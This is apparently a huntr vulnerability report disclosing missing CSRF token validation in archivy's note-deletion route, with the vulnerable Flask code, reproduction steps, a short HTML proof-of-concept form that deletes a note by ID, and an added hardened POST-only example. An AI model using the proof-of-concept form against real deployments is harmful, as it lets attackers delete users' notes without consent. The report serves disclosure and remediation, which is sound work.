huntr report E204A768-2129-4B6F-ABAD-E436309C7C32 by scara31
History: Dec 22, 2021 - 6:32 a.m.

Cross-Site Request Forgery (CSRF) in archivy/archivy

2021-12-22 06:32:35
scara31
www.huntr.dev
5
Tags: csrf, token validation, note deletion, archivy

EPSS

0.001

Percentile

31.5%

Title

Missing CSRF token validation leads to note deletion.

Summary

The route /dataobj/delete/<int:dataobj_id> is responsible for note deletion. Instead of POST, it accepts the GET and DELETE methods.

@app.route("/dataobj/delete/<int:dataobj_id>", methods=["DELETE", "GET"])
def delete_data(dataobj_id):
    try:
        data.delete_item(dataobj_id)
    except BaseException:
        flash("Data could not be found!", "error")
        return redirect("/")
    flash("Data deleted!", "success")
    return redirect("/")

While both requests carry a CSRF token, the token is in fact never verified server-side, so it can simply be omitted from the query, which leads to CSRF.

Steps to reproduce

  1. Create any note and get its ID.
  2. Open the page from PoC.html with the concrete ID in your browser and click the button.
  3. Observe that the note with the specified ID was deleted.

Proof of Concept

// PoC.html
<form action="http://127.0.0.1:5000/dataobj/delete/{yourNoteID}" method="GET">
<input type="submit" value="Click me"/>
</form>

Possible remediation

Use the POST method instead and verify the CSRF token.
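The following is an added, framework-agnostic example (not archivy's code) of the fix described above: a stand-in for the delete route that accepts only POST and checks a per-session CSRF token in constant time before deleting anything. The session, form and notes dictionaries are constructed placeholders for Flask's request objects.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Added example (not archivy's code): the server-side check the vulnerable
# route lacks. A per-session CSRF token is issued, echoed back in a POST body,
# and compared in constant time before the deletion is performed.

def issue_csrf_token(session: Dict[str, str]) -> str:
    """Create (or reuse) the CSRF token stored in the user's session."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def csrf_token_valid(session: Dict[str, str], submitted: Optional[str]) -> bool:
    """True only if a token was submitted and matches the session's token."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # Constant-time comparison avoids leaking the token via timing.
    return hmac.compare_digest(expected.encode(), submitted.encode())

def handle_delete(method: str, session: Dict[str, str], form: Dict[str, str],
                  notes: Dict[int, str], note_id: int) -> Tuple[int, str]:
    """Hardened stand-in for /dataobj/delete/<id>: POST only, token required.

    Returns (HTTP status, message) in place of Flask's flash()/redirect().
    """
    if method != "POST":
        return 405, "Method Not Allowed"             # GET/DELETE no longer delete
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403, "Invalid or missing CSRF token"  # closes the bypass in the report
    if note_id not in notes:
        return 404, "Data could not be found!"
    del notes[note_id]
    return 200, "Data deleted!"

if __name__ == "__main__":
    # Constructed sample data: one logged-in session, one note with id 1.
    session: Dict[str, str] = {}
    notes = {1: "my note"}
    token = issue_csrf_token(session)
    # The PoC's forged GET form is rejected before any deletion happens.
    print(handle_delete("GET", session, {}, notes, 1))
    # A cross-origin POST cannot learn the session token, so it is rejected too.
    print(handle_delete("POST", session, {"csrf_token": "guess"}, notes, 1))
    # The legitimate form, carrying the session's token, succeeds.
    print(handle_delete("POST", session, {"csrf_token": token}, notes, 1))
```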

Impact

This vulnerability allows an attacker to delete a user's notes.
